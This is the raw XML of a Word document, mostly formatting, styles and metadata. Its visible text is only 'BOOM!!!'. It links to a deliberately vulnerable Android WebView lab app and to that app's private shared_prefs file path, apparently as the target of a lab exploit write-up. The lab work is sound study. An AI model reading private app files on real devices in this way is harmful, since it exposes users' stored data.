          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE47E1F" w14:textId="77777777" w:rsidR="003634D2" w:rsidRDefault="003634D2" w:rsidP="00A013C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2EC55A" w14:textId="56087104" w:rsidR="00297292" w:rsidRDefault="00297292" w:rsidP="00A013C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BOOM!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD819BA" w14:textId="77777777" w:rsidR="003634D2" w:rsidRPr="003634D2" w:rsidRDefault="003634D2" w:rsidP="003634D2"/>
    <w:p w14:paraId="001A2056" w14:textId="77777777" w:rsidR="003634D2" w:rsidRDefault="003634D2" w:rsidP="003634D2"/>
    <w:p w14:paraId="6703522A" w14:textId="77777777" w:rsidR="00DD06F1" w:rsidRPr="00DD06F1" w:rsidRDefault="00DD06F1" w:rsidP="00DD06F1"/>
    <w:p w14:paraId="4F93969E" w14:textId="77777777" w:rsidR="00DD06F1" w:rsidRPr="00DD06F1" w:rsidRDefault="00DD06F1" w:rsidP="00DD06F1"/>
    <w:p w14:paraId="40E0C5DB" w14:textId="77777777" w:rsidR="00DD06F1" w:rsidRPr="00DD06F1" w:rsidRDefault="00DD06F1" w:rsidP="00DD06F1"/>
    <w:p w14:paraId="70D0D5F6" w14:textId="77777777" w:rsidR="00DD06F1" w:rsidRPr="00DD06F1" w:rsidRDefault="00DD06F1" w:rsidP="00DD06F1"/>
    <w:sectPr w:rsidR="00DD06F1" w:rsidRPr="00DD06F1" w:rsidSect="00667CAA">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="624"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1F428" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E4D" w:rsidP="008E30AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E6F0C9E" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E4D" w:rsidP="008E30AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="0D84B274" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E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B0BAC" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E4D" w:rsidP="008E30AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6766C176" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E4D" w:rsidP="008E30AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="09B9557F" w14:textId="77777777" w:rsidR="00300E4D" w:rsidRDefault="00300E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B110C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5518E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D176F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1750DE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F71547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E946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C329FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C4E8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2212168">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="327369485">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2033993692">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="309871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E38EE"/>
    <w:rsid w:val="000045A2"/>
    <w:rsid w:val="00023020"/>
    <w:rsid w:val="0002724B"/>
    <w:rsid w:val="0003623F"/>
    <w:rsid w:val="00062D3A"/>
    <w:rsid w:val="000641BE"/>
    <w:rsid w:val="00066BD8"/>
    <w:rsid w:val="00081206"/>
    <w:rsid w:val="0008198E"/>
    <w:rsid w:val="00095E16"/>
    <w:rsid w:val="000A20F4"/>
    <w:rsid w:val="000A36A9"/>
    <w:rsid w:val="000A7A8B"/>
    <w:rsid w:val="000B4E8C"/>
    <w:rsid w:val="000F75F8"/>
    <w:rsid w:val="001362B4"/>
    <w:rsid w:val="00141302"/>
    <w:rsid w:val="0014636B"/>
    <w:rsid w:val="00167D69"/>
    <w:rsid w:val="001727EB"/>
    <w:rsid w:val="00174C38"/>
    <w:rsid w:val="0017550C"/>
    <w:rsid w:val="001904A0"/>
    <w:rsid w:val="001B7F90"/>
    <w:rsid w:val="001E21AF"/>
    <w:rsid w:val="00212397"/>
    <w:rsid w:val="00216B1A"/>
    <w:rsid w:val="0022433D"/>
    <w:rsid w:val="00297292"/>
    <w:rsid w:val="002974D2"/>
    <w:rsid w:val="002B1375"/>
    <w:rsid w:val="002B54AA"/>
    <w:rsid w:val="002E1CF0"/>
    <w:rsid w:val="002E46A5"/>
    <w:rsid w:val="00300E4D"/>
    <w:rsid w:val="00301EC3"/>
    <w:rsid w:val="00307F20"/>
    <w:rsid w:val="003634D2"/>
    <w:rsid w:val="003830B2"/>
    <w:rsid w:val="0039379D"/>
    <w:rsid w:val="003C6017"/>
    <w:rsid w:val="003D222A"/>
    <w:rsid w:val="003E1019"/>
    <w:rsid w:val="00403752"/>
    <w:rsid w:val="00421088"/>
    <w:rsid w:val="004415AE"/>
    <w:rsid w:val="00461EA4"/>
    <w:rsid w:val="00462734"/>
    <w:rsid w:val="00470691"/>
    <w:rsid w:val="00473C43"/>
    <w:rsid w:val="00484E02"/>
    <w:rsid w:val="00484EF4"/>
    <w:rsid w:val="004B01C2"/>
    <w:rsid w:val="004B6765"/>
    <w:rsid w:val="004E09F3"/>
    <w:rsid w:val="004E15B5"/>
    <w:rsid w:val="004E1F70"/>
    <w:rsid w:val="004F15BA"/>
    <w:rsid w:val="004F6387"/>
    <w:rsid w:val="0050262C"/>
    <w:rsid w:val="00510E3C"/>
    <w:rsid w:val="00535BA6"/>
    <w:rsid w:val="00537C24"/>
    <w:rsid w:val="00542A0C"/>
    <w:rsid w:val="00553085"/>
    <w:rsid w:val="005541E3"/>
    <w:rsid w:val="00563811"/>
    <w:rsid w:val="00575585"/>
    <w:rsid w:val="00576389"/>
    <w:rsid w:val="0059731F"/>
    <w:rsid w:val="005B031A"/>
    <w:rsid w:val="005C68A7"/>
    <w:rsid w:val="005D2DBF"/>
    <w:rsid w:val="005F2863"/>
    <w:rsid w:val="005F6D1E"/>
    <w:rsid w:val="00612A9B"/>
    <w:rsid w:val="006239C3"/>
    <w:rsid w:val="00635EF3"/>
    <w:rsid w:val="00663EFF"/>
    <w:rsid w:val="00667CAA"/>
    <w:rsid w:val="00692057"/>
    <w:rsid w:val="006A5117"/>
    <w:rsid w:val="006B2F1F"/>
    <w:rsid w:val="0070353D"/>
    <w:rsid w:val="00711277"/>
    <w:rsid w:val="0074753E"/>
    <w:rsid w:val="00770E0A"/>
    <w:rsid w:val="00782230"/>
    <w:rsid w:val="00794BFF"/>
    <w:rsid w:val="007955CB"/>
    <w:rsid w:val="007A25A7"/>
    <w:rsid w:val="007A7764"/>
    <w:rsid w:val="007C2352"/>
    <w:rsid w:val="007C2951"/>
    <w:rsid w:val="007C3709"/>
    <w:rsid w:val="007C5D53"/>
    <w:rsid w:val="007C6482"/>
    <w:rsid w:val="007D47DE"/>
    <w:rsid w:val="007F7E67"/>
    <w:rsid w:val="0082186D"/>
    <w:rsid w:val="00824BD2"/>
    <w:rsid w:val="0083223E"/>
    <w:rsid w:val="00841272"/>
    <w:rsid w:val="00846881"/>
    <w:rsid w:val="008626D4"/>
    <w:rsid w:val="00883897"/>
    <w:rsid w:val="00887247"/>
    <w:rsid w:val="008A4B52"/>
    <w:rsid w:val="008D432A"/>
    <w:rsid w:val="008E2DE3"/>
    <w:rsid w:val="008E30AF"/>
    <w:rsid w:val="008F2974"/>
    <w:rsid w:val="008F4F76"/>
    <w:rsid w:val="008F5FAE"/>
    <w:rsid w:val="00944625"/>
    <w:rsid w:val="00964283"/>
    <w:rsid w:val="009701DA"/>
    <w:rsid w:val="00970DB7"/>
    <w:rsid w:val="00971307"/>
    <w:rsid w:val="009A3C7F"/>
    <w:rsid w:val="009B212F"/>
    <w:rsid w:val="009B3A3E"/>
    <w:rsid w:val="009C167D"/>
    <w:rsid w:val="009C2AE1"/>
    <w:rsid w:val="009C3D05"/>
    <w:rsid w:val="009D100C"/>
    <w:rsid w:val="009D5691"/>
    <w:rsid w:val="009E2417"/>
    <w:rsid w:val="009E38EE"/>
    <w:rsid w:val="009E7E08"/>
    <w:rsid w:val="009F1BD7"/>
    <w:rsid w:val="00A013C8"/>
    <w:rsid w:val="00A22828"/>
    <w:rsid w:val="00A309FF"/>
    <w:rsid w:val="00A36BE8"/>
    <w:rsid w:val="00A375F1"/>
    <w:rsid w:val="00A41CA1"/>
    <w:rsid w:val="00A52356"/>
    <w:rsid w:val="00A913BB"/>
    <w:rsid w:val="00AB7D1A"/>
    <w:rsid w:val="00AC6B19"/>
    <w:rsid w:val="00AD2619"/>
    <w:rsid w:val="00AF1DF6"/>
    <w:rsid w:val="00B2036C"/>
    <w:rsid w:val="00B36423"/>
    <w:rsid w:val="00B62DE1"/>
    <w:rsid w:val="00B659CB"/>
    <w:rsid w:val="00B83B41"/>
    <w:rsid w:val="00B86A90"/>
    <w:rsid w:val="00BA7329"/>
    <w:rsid w:val="00BC54D1"/>
    <w:rsid w:val="00BF749E"/>
    <w:rsid w:val="00C06E3F"/>
    <w:rsid w:val="00C11E19"/>
    <w:rsid w:val="00C241B5"/>
    <w:rsid w:val="00C32016"/>
    <w:rsid w:val="00C460DA"/>
    <w:rsid w:val="00C65376"/>
    <w:rsid w:val="00C968BF"/>
    <w:rsid w:val="00CB04A9"/>
    <w:rsid w:val="00CB29F2"/>
    <w:rsid w:val="00D059B6"/>
    <w:rsid w:val="00D1309D"/>
    <w:rsid w:val="00D50740"/>
    <w:rsid w:val="00D60031"/>
    <w:rsid w:val="00D76656"/>
    <w:rsid w:val="00DD06F1"/>
    <w:rsid w:val="00DE27E9"/>
    <w:rsid w:val="00DE50DF"/>
    <w:rsid w:val="00DE5909"/>
    <w:rsid w:val="00DF5000"/>
    <w:rsid w:val="00E04EF7"/>
    <w:rsid w:val="00E160BC"/>
    <w:rsid w:val="00E451B1"/>
    <w:rsid w:val="00E5196A"/>
    <w:rsid w:val="00E6645F"/>
    <w:rsid w:val="00E70738"/>
    <w:rsid w:val="00E724B7"/>
    <w:rsid w:val="00E72F36"/>
    <w:rsid w:val="00EA2C46"/>
    <w:rsid w:val="00EF3623"/>
    <w:rsid w:val="00F240A0"/>
    <w:rsid w:val="00F371BD"/>
    <w:rsid w:val="00F52225"/>
    <w:rsid w:val="00F859B3"/>
    <w:rsid w:val="00F8692B"/>
    <w:rsid w:val="00FB6691"/>
    <w:rsid w:val="00FC0DF8"/>
    <w:rsid w:val="00FD1A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7EE33"/>
  <w15:docId w15:val="{A325E24A-648B-49F8-99D5-EDFC12A96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E38E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9E38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A013C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38EE"/>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9E38EE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009E38EE"/>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A013C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82230"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D1309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normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D1309D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D1309D"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00066BD8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E3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0AF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E3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472442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="419840952">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="897323508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1177114362">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1559516927">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802574855">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2094009587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2122189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4kemyh4nd/vulnwebview" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bing.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data/data/com.tmh.%20vulnwebview/shared_prefs/MainActivity.x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1FE67-900D-4DE5-A1D0-87D762D44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Pages>
  <Words>378</Words>
  <Characters>2158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CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="18" baseType="variant">
      <vt:variant>
        <vt:i4>458766</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>\data\data\com.tmh. vulnwebview\shared_prefs\MainActivity.xml</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114125</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://bing.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849750</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://github.com/t4kemyh4nd/vulnwebview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Srivastava</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jagdish Rathod</cp:lastModifiedBy>
  <cp:revision>99</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-27T23:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-03T13:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>